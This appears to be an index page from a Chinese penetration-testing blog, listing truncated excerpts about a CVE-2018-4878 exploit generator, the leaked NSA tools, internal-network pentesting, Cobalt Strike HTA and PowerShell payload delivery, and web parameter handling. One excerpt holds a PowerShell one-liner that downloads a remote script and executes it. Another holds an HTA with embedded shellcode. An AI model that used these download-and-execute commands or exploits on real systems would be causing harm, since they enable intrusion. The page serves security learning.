CVE-2018-4878 Exploit生成器

RedFree | Metasploit, ShellCode, Windows | 2018-02-23
CVE-2018-4878 Exploit生成器
Git地址:https://github.com/anbai-inc/CVE-2018-4878样本来源:https://github.com/brianwrf/CVE-2017-4878-Samples分析报告:http://blog.talosintelligence.com/2018/02/group-123-goes-wild.htmlPython生成Exploit代码(Windows弹计算器):#!/usr/bin/env python # coding: UTF-8 buf =  "" buf&nb... [阅读全文]
ė4,738 次访问 6没有评论 0,

ShadowBroker公布的NSA工具使用方法

RedFree | CobaltStrike, Metasploit, Windows | 2017-04-19
ShadowBroker公布的NSA工具使用方法
工具包下载地址:https://github.com/x0rz/EQGRP_Lost_in_Translationhttps://github.com/misterch0c/shadowbroker windows文件夹,包含windows 利用工具,植入和payload; swift文件夹,包含攻击银行的操作系统; OddJob文件夹,有关于OddJob后门的文档Exploit位于解压后的windows目录,安装python2.6 32位及pywin32,注释掉fb.py中的... [阅读全文]

内网渗透学习简明教程[转载]

RedFree | Linux, Python, Windows | 2016-10-22
内网渗透学习简明教程[转载]
https://github.com/l3m0n/pentest_study域环境搭建准备: DC: win2008 DM: win2003 DM: winxpwin2008(域控) 1、修改计算机名: 2、配置固定ip: 其中网关设置错误,应该为192.168.206.2,开始默认的网管 3、服务器管理器---角色: 4、配置域服务: dos下面输入dcpromo Ps:这里可能会因为本地administrator的密码规则不合要求,导致... [阅读全文]

CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型

RedFree | CobaltStrike, JAVA, Metasploit, VB, Windows | 2016-10-19
CobaltStrike 3.x生成HTML应用程序(.hta)的三种类型
1、Executableevil.hta代码:<script language="VBScript">     Function var_func()         var_shellcode = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000000000000000000... [阅读全文]

CobaltStrike 3.x远程调用脚本获取会话的4种模式

RedFree | CobaltStrike, JAVA, Metasploit, Python, Windows | 2016-10-19
CobaltStrike 3.x远程调用脚本获取会话的4种模式
在CobaltStrike 3.x中有4种远程调用脚本执行载荷的方法:1、Powershell远程调用命令:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.118/rev'))"远程脚本内容:$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("... [阅读全文]

ASP/PHP/JSP获取参数的顺序及参数叠加效果

RedFree | JAVA, PHP, Windows, 经验积累, 默认分类 | 2016-09-18
ASP/PHP/JSP获取参数的顺序及参数叠加效果
一、ASP代码<%response.write(request("id"))%>测试效果分析    ASP的GET参数比POST参数的优先级高,参数叠加提交最终会以逗号分割拼接。二、PHP代码<?php echo($_REQUEST['id']);?>测试效果分析PHP(php7)的POST参数优先级比GET高,参数叠加提交最终会使用最后一个参数值。三、JSP代码<%out.prin... [阅读全文]
ė82 次访问 6没有评论 0, ,

Reg命令使用详解 批处理操作注册表必备

RedFree | Windows | 2016-07-15
首先要说明:编辑注册表不当可能会严重损坏您的系统。在更改注册表之前,应备份计算机上任何有价值的数据只有在别无选择的情况下,才直接编辑注册表。注册表编辑器会忽略标准的安全措施,从而使得这些设置会降低性能、破坏系统,甚至要求用户重新安装Windows。可以利用“控制面板”或“Microsoft管理控制台(MMC)”中的程序安全更改多数注册表设置。如果必须... [阅读全文]
Ɣ回顶部